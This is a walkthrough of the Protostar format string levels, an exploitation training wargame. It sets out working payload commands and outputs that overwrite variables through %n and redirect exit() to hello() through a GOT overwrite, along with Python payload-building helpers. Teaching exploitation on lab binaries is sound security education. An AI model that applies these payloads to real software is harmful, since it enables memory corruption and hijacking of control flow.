Exploit Exercises — Protostar Format Levels

This is a Protostar walkthrough covering format string exploitation.

This article is the only thing you need to complete these levels.

Format 0

$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)

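When we use %64d, sprintf reads one integer argument from the stack and prints it padded to a width of 64 characters, which fills the buffer. The four bytes of 0xdeadbeef that follow are then copied past the end of the buffer, and this overflow sets the target.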
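To make the byte counts concrete, here is a minimal sketch in Python 3 (the one-liners in this walkthrough are Python 2). It only models how the argument expands. The helper names are made up for illustration, and the integer printed by %64d is assumed to be 0, since the real value is whatever happens to be on the stack.

```python
import struct

def format0_argument(buffer_size=64, value=0xdeadbeef):
    # The format spec and the raw little-endian bytes that follow it.
    spec = "%{}d".format(buffer_size).encode()
    return spec, struct.pack("<I", value)

def expanded(spec, tail, stack_int=0):
    # Model of the output: the spec becomes a space-padded decimal number,
    # and the trailing bytes are copied unchanged.
    return (spec.decode() % stack_int).encode() + tail

spec, tail = format0_argument()
out = expanded(spec, tail)
print(len(out), out[64:].hex())  # 68 efbeadde
```

The first 64 bytes are padding, and bytes 64..67 are the ones that land outside the buffer.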

Format 1

Read this first to understand how different variables are stored. Then we look for target:

$ objdump -t format1 | grep target
08049638 g     O .bss   00000004              target

We see the needed variable is in uninitialized data segment called .bss and has the address 0x08049638.

Then I dumped 146 words (4 bytes each) from the stack to find where our string is stored:

$ ./format1 ABCD`python -c 'print "%x."*146'`

ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.

Can you see the value 0x44434241 near the end? You can also find the offset by brute force:

$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241
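The same offset can also be read from a "%x." dump by counting fields. Below is a small Python 3 sketch of that idea. The function name and the shortened sample dump are made up for illustration, and only the field format matches the real output.

```python
def find_argument_index(dump, marker="44434241", prefix="ABCD"):
    # The program echoes the literal prefix before the first %x output.
    if dump.startswith(prefix):
        dump = dump[len(prefix):]
    # Each "%x." prints one stack word followed by a dot, so the n-th
    # non-empty field is the n-th printf argument (1-based).
    words = [w for w in dump.split(".") if w]
    return words.index(marker) + 1

# Shortened, made-up dump in the same format as the real output.
sample = "ABCD804960c.bffff508.0.44434241.252e7825."
print(find_argument_index(sample))  # 4
```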

%4$x is what is called “direct parameter access”: it prints the 4th argument without stepping through the ones before it.

You can see ABCD above as 44434241 (don’t forget we are on a little-endian machine). Now we know the offset and can access this value directly:

$ ./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241

Now we know the offset of our string among the printf arguments, and we can overwrite the value using %n. Read more about using %n here. In a nutshell, %n expects the address of an int variable and stores there the number of bytes printed so far.

So if you use something like <addr>%142$n, printf takes addr as its 142nd argument and writes the number of bytes printed so far to that address.

We know the address is 0x08049638, which in little-endian byte order is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:

$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)
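If you don't want to reverse the bytes by hand, the struct module can do it. This is a hedged Python 3 sketch. The function name is made up, and the defaults are just the address and offset found above.

```python
import struct

def format1_argument(target_addr=0x08049638, arg_index=142):
    # "<I" packs an unsigned 32-bit integer in little-endian byte order.
    address = struct.pack("<I", target_addr)
    return address + "%{}$n".format(arg_index).encode()

print(format1_argument())  # b'8\x96\x04\x08%142$n'
```

Byte 0x38 is the ASCII character 8, which is why the program output starts with an 8 followed by unprintable bytes.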

Format 2

Now we are supposed to overwrite the variable with a particular value, 64.

Let’s brute-force the offset first:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(

Now we need to find the address of the target variable:

$ objdump -t format2 | grep target
080496e4 g     O .bss   00000004              target

Let’s first try to overwrite the variable with an arbitrary value:

$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(

We printed 4 bytes (the address) before %4$n, so target is now 4. If we want to write a larger value, we just need to print more bytes before %n. In this case printf outputs 64 bytes (4 address bytes plus 60 A's) before it reaches %4$n, which then stores that count in target:

$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
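The padding arithmetic is simple enough to wrap in a helper. This is a minimal Python 3 sketch with a made-up function name. It assumes the address is the first thing in the input and that filler bytes are plain A's, as in the command above.

```python
import struct

def format2_payload(target_addr=0x080496e4, wanted=64, arg_index=4):
    address = struct.pack("<I", target_addr)
    # %n stores the number of bytes printed so far, so the filler must
    # bring the total (address bytes included) up to the wanted value.
    padding = wanted - len(address)
    if padding < 0:
        raise ValueError("wanted value is smaller than the address itself")
    return address + b"A" * padding + "%{}$n".format(arg_index).encode()

payload = format2_payload()
print(payload.count(b"A"))  # 60
```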

Format 3

We start this challenge with bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(

Now we need to find the memory address of target:

$ objdump -t format3 | grep target
080496f4 g     O .bss   00000004              target

So let’s try to rewrite target:

$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(

Awesome! target is now 4, the number of bytes printed before %12$n.

Then I extended the string to look at the stack:

$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(

Now let’s put the address into the 12th argument, write through it directly, and then look at the values on the stack:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(
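The value 0x1c is just the number of bytes printed before %12$n. Here is a tiny Python 3 check of that. The helper name is made up, and it only works while nothing before the first % is itself a conversion.

```python
import struct

def count_before_first_n(payload):
    # Every byte before the first "%" is printed literally and counted once.
    return payload.index(b"%")

payload = (struct.pack("<I", 0x080496f4)
           + b"BBBBCCCCDDDDEEEEFFFFGGGG"
           + b"%12$n")
print(hex(count_before_first_n(payload)))  # 0x1c
```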

To be clearer, let’s draw a simple scheme of our stack:

junk              <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08  <- 12th value
BBBB              <- 13th value
CCCC              <- 14th value
DDDD              <- 15th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saved ret>

I understand that this could be confusing, because these numbers have nothing to do with how the stack grows. They are just argument numbers. If it is still unclear, try to read about direct access in this paper.
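One way to keep the numbering straight is to cut the input into 4-byte words and label them. This is a rough Python 3 sketch with a made-up helper name. It assumes the input starts exactly at argument 12, as the brute force showed for this level.

```python
import struct

def argument_map(payload, first_index=12):
    # Cut the input into whole 4-byte words and label each one with the
    # printf argument number that refers to it.
    usable = len(payload) - len(payload) % 4
    words = [payload[i:i + 4] for i in range(0, usable, 4)]
    return {first_index + n: word for n, word in enumerate(words)}

payload = struct.pack("<I", 0x080496f4) + b"BBBBCCCCDDDD"
for index, word in argument_map(payload).items():
    print(index, word)
```

So %12$n uses the first word as its pointer, %13$n the second one, and so on.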

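Now everything is clear: we need to replace BBBB, CCCC, DDDD with address + i (i = 1, 2, 3) so that each %n starts at a different byte, and add padding before each %n so that the right value is written.

Let’s try to overwrite the lowest byte first. It must be 0x44, so after the 16 bytes at the start of the string we need 52 more bytes of padding (16 + 52 = 68 = 0x44):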

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD                                                   0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(

Then I tried to overwrite the second byte:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0
target is 00004444 :(

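Awesome, it works. I didn’t know that printf keeps counting the bytes written across the whole string, so every %n sees a total that only grows. That makes it easier to write small values first. We need to get 0x01025544, but we certainly cannot write 0x01 and 0x02 as they are, because the count is already larger than that. However, we can write a larger value with the same low byte, 0x101 for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).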
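To see why two overlapping writes give 0x4444, here is a small Python 3 model of what %n does to memory. It is only a simulation under the assumption that each %n stores a 4-byte little-endian int, and the function name is made up.

```python
import struct

def apply_n_writes(writes, base, size=8):
    # writes: (address, count) pairs in the order printf reaches each %n.
    memory = bytearray(size)
    for address, count in writes:
        offset = address - base
        # Each %n stores a full 4-byte int, so later writes overlap
        # the upper bytes of earlier ones.
        memory[offset:offset + 4] = struct.pack("<I", count)
    return memory

TARGET = 0x080496f4
mem = apply_n_writes([(TARGET, 0x44), (TARGET + 1, 0x44)], base=TARGET)
print(hex(struct.unpack("<I", mem[:4])[0]))  # 0x4444
```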

0x55 is the second byte, so we need to increase our address by just 1 and add 0x55 - 0x44 = 17 bytes of padding:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0       3221222592
target is 00005544 :(

Instead of writing 0x101 and 0x102 separately, we can try to write 0x102 as a two-byte value at address + 2 (0x102 - 0x55 = 173 more bytes of padding):

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD                                                   0       3221222592                                                                                                                                                                   3086843892
you have modified the target :)

Wow, we modified the target :)
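The three widths used above (52, 17, 173) follow directly from the running count. This is a hedged Python 3 sketch of that calculation. The function name is made up, and the minimum of 10 is my assumption to keep %u from printing more characters than the requested width (a 32-bit unsigned value has at most 10 decimal digits).

```python
def paddings(values, header_len):
    # values: the running output count wanted at each successive %n.
    # The count never decreases, so the values must be increasing.
    pads, written = [], header_len
    for value in values:
        pad = value - written
        if pad < 10:
            raise ValueError("width too small to control the count exactly")
        pads.append(pad)
        written = value
    return pads

# 16 bytes of header: three addresses plus DDDD.
print(paddings([0x44, 0x55, 0x102], header_len=16))  # [52, 17, 173]
```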

Format 4

Now we need to redirect the execution flow. My first idea was to just overwrite the return address.

As always we start with finding the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141

Now let’s find the address of the hello() function:

$ objdump -t format4 | grep hello
080484b4 g     F .text  0000001e              hello

At this point I understood that we are not supposed to overwrite the return address (vuln() ends by calling exit(), so it never returns). Instead we need to change an entry that the relocation table points to.

Let’s look at relocations:

$ objdump -TR format4

format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata    00000004  Base        _IO_stdin_used
08049730 g    DO .bss   00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

You can also inspect the relocation table with:

$ readelf -r format4

Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496fc  00000106 R_386_GLOB_DAT    00000000   __gmon_start__
08049730  00000905 R_386_COPY        08049730   stdin

Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804970c  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
08049710  00000207 R_386_JUMP_SLOT   00000000   fgets
08049714  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main
08049718  00000407 R_386_JUMP_SLOT   00000000   _exit
0804971c  00000507 R_386_JUMP_SLOT   00000000   printf
08049720  00000607 R_386_JUMP_SLOT   00000000   puts
08049724  00000707 R_386_JUMP_SLOT   00000000   exit
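If you want to pull the slot address out of this output in a script, a few lines of Python 3 are enough. This is only a sketch. The function name is made up, and it assumes the five-column layout shown above.

```python
def jump_slots(readelf_output):
    # Map each imported function name to the address of its jump slot.
    slots = {}
    for line in readelf_output.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[2] == "R_386_JUMP_SLOT":
            slots[fields[4]] = int(fields[0], 16)
    return slots

# Two lines copied from the readelf output above.
sample = """\
08049720  00000607 R_386_JUMP_SLOT   00000000   puts
08049724  00000707 R_386_JUMP_SLOT   00000000   exit
"""
print(hex(jump_slots(sample)["exit"]))  # 0x8049724
```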

Good articles about shared libraries and relocations:

I thought it would be a good idea to overwrite the entry for exit() with the address of hello(). Thus we need to replace the value at address 0x08049724 with 0x080484b4.

Now let’s use a test exploit:

$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt

$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()

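Awesome. We overwrote the lower two bytes and jumped to 0x000084b4 (4 address bytes + 33968 bytes of padding = 33972 = 0x84b4). Let’s do the same with the other two bytes. The upper half must be 0x0804, which is smaller than the current count, so we pad until the count reaches 0x10804, whose low two bytes are 0x0804 (0x10804 - 0x84b4 = 33616). Do not forget to correct the first padding (subtract 4, because we added another 4-byte address).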

Now run the exploit:

$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win
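The two paddings can be computed instead of worked out by hand. Below is a minimal Python 3 sketch of the two-half write used above. The function name and parameters are made up, and the minimum width of 8 is my assumption to keep %x from printing more characters than requested (a 32-bit value has at most 8 hex digits).

```python
import struct

def got_overwrite_payload(slot, value, first_arg):
    low, high = value & 0xffff, (value >> 16) & 0xffff
    # Two pointers: one to the low half of the slot, one to the high half.
    header = struct.pack("<II", slot, slot + 2)
    first_pad = low - len(header)
    # The count only grows, so go past 0x10000 if the high half is smaller.
    second_pad = (high - low) % 0x10000
    for pad in (first_pad, second_pad):
        if pad < 8:
            raise ValueError("width too small to control the count exactly")
    fmt = "%{}x%{}$n%{}x%{}$n".format(
        first_pad, first_arg, second_pad, first_arg + 1)
    return header + fmt.encode()

payload = got_overwrite_payload(slot=0x08049724, value=0x080484b4, first_arg=4)
print(payload[8:].decode())  # %33964x%4$n%33616x%5$n
```

Note that each %n still stores 4 bytes, so the second write also puts 0x0001 into the two bytes right after the exit() slot.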